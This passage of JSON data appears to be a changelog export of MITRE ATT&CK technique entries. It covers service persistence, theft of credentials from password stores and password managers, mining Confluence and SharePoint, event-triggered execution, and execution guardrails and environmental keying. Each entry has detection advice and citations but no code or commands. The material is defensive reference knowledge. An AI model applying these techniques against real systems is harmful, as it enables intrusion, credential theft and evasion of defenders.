"description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection). ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1543",
"external_id": "T1543"
},
{
"source_name": "TechNet Services",
"description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.",
"url": "https://technet.microsoft.com/en-us/library/cc772408.aspx"
},
{
"source_name": "AppleDocs Launch Agent Daemons",
"description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.",
"url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"
},
{
"source_name": "OSX Malware Detection",
"description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.",
"url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Service: Service Creation",
"Service: Service Modification",
"Process: Process Creation",
"Process: OS API Execution",
"Command: Command Execution",
"Windows Registry: Windows Registry Key Creation",
"Windows Registry: Windows Registry Key Modification",
"File: File Creation",
"File: File Modification"
],
"x_mitre_detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 07:41:41.496000+00:00\", \"old_value\": \"2020-10-09 13:46:29.922000+00:00\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1018: User Account Management",
"M1022: Restrict File and Directory Permissions",
"M1033: Limit Software Installation",
"M1047: Audit"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0019: Service (Service Creation)",
"DS0019: Service (Service Modification)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)",
"DS0024: Windows Registry (Windows Registry Key Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-11 18:48:28.456000+00:00",
"modified": "2021-06-21 17:58:03.788000+00:00",
"name": "Credentials from Password Stores",
"description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1555",
"external_id": "T1555"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"File: File Access",
"Command: Command Execution",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_detection": "Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-21 17:58:03.788000+00:00\", \"old_value\": \"2021-04-29 21:00:19.428000+00:00\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1027: Password Policies"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Access)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-01-22 16:08:40.629000+00:00",
"modified": "2021-06-21 17:58:03.269000+00:00",
"name": "Password Managers",
"description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1555/005",
"external_id": "T1555.005"
},
{
"source_name": "ise Password Manager February 2019",
"description": "ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.",
"url": "https://www.ise.io/casestudies/password-manager-hacking/"
},
{
"source_name": "FoxIT Wocao December 2019",
"description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.",
"url": "https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf"
},
{
"source_name": "Github KeeThief",
"description": "Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, 2021.",
"url": "https://github.com/GhostPack/KeeThief"
},
{
"source_name": "NVD CVE-2019-3610",
"description": "National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3610"
},
{
"source_name": "Cyberreason Anchor December 2019",
"description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.",
"url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Matt Burrough, @mattburrough, Microsoft"
],
"x_mitre_data_sources": [
"Process: OS API Execution",
"File: File Access",
"Process: Process Access",
"Command: Command Execution"
],
"x_mitre_detection": "Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. \n\nConsider monitoring file reads surrounding known password manager applications.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-21 17:58:03.269000+00:00\", \"old_value\": \"2021-04-14 19:15:22.416000+00:00\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1027: Password Policies",
"M1051: Update Software",
"M1054: Software Configuration"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Access)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-14 13:09:51.004000+00:00",
"modified": "2021-06-08 17:08:08.386000+00:00",
"name": "Confluence",
"description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1213/001",
"external_id": "T1213.001"
},
{
"source_name": "Atlassian Confluence Logging",
"description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.",
"url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Logon Session: Logon Session Creation",
"Application Log: Application Log Content"
],
"x_mitre_detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"SaaS"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-08 17:08:08.386000+00:00\", \"old_value\": \"2020-03-24 16:42:09.222000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\\n\\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.\", \"old_value\": \"Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\\n\\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\\n+Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\\n \\n User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1017: User Training",
"M1018: User Account Management",
"M1047: Audit"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0015: Application Log (Application Log Content)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-14 13:35:32.938000+00:00",
"modified": "2021-06-08 17:10:31.187000+00:00",
"name": "Sharepoint",
"description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1213/002",
"external_id": "T1213.002"
},
{
"source_name": "Microsoft SharePoint Logging",
"description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.",
"url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Logon Session: Logon Session Creation",
"Application Log: Application Log Content"
],
"x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Office 365"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-08 17:10:31.187000+00:00\", \"old_value\": \"2020-03-24 16:41:00.821000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \\n\\n\", \"old_value\": \"The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \\n\\n\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1,2 @@\\n-The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \\n+The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \\n \"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1017: User Training",
"M1018: User Account Management",
"M1047: Audit"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0015: Application Log (Application Log Content)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-22 21:04:23.285000+00:00",
"modified": "2021-10-16 20:11:14.193000+00:00",
"name": "Event Triggered Execution",
"description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1546",
"external_id": "T1546"
},
{
"source_name": "FireEye WMI 2015",
"description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.",
"url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"
},
{
"source_name": "Malware Persistence on OS X",
"description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.",
"url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
},
{
"source_name": "amnesia malware",
"description": "Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Windows Registry: Windows Registry Key Modification",
"Command: Command Execution",
"File: File Creation",
"File: File Modification",
"WMI: WMI Creation",
"File: File Metadata",
"Module: Module Load"
],
"x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-16 20:11:14.193000+00:00\", \"old_value\": \"2021-04-13 21:32:54.610000+00:00\"}}}",
"previous_version": "1.1",
"changelog_mitigations": {
"shared": [],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0005: WMI (WMI Creation)",
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0022: File (File Metadata)",
"DS0022: File (File Modification)",
"DS0024: Windows Registry (Windows Registry Key Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-01-31 02:10:08.261000+00:00",
"modified": "2021-06-09 18:53:58.471000+00:00",
"name": "Execution Guardrails",
"description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1480",
"external_id": "T1480"
},
{
"source_name": "FireEye Kevin Mandia Guardrails",
"description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.",
"url": "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/"
},
{
"source_name": "FireEye Outlook Dec 2019",
"description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.",
"url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Nick Carr, Mandiant"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Anti-virus",
"Host forensic analysis",
"Signature-based detection",
"Static file analysis"
],
"x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-09 18:53:58.471000+00:00\", \"old_value\": \"2020-06-24 18:52:12.956000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Nick Carr, Mandiant\", \"old_value\": \"Nick Carr, FireEye\"}}}",
"previous_version": "1.1",
"changelog_mitigations": {
"shared": [
"M1055: Do Not Mitigate",
"T1480: Environmental Keying Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-06-23 22:28:28.041000+00:00",
"modified": "2021-06-09 18:53:58.159000+00:00",
"name": "Environmental Keying",
"description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1480/001",
"external_id": "T1480.001"
},
{
"source_name": "EK Clueless Agents",
"description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.",
"url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf"
},
{
"source_name": "Kaspersky Gauss Whitepaper",
"description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.",
"url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf"
},
{
"source_name": "Proofpoint Router Malvertising",
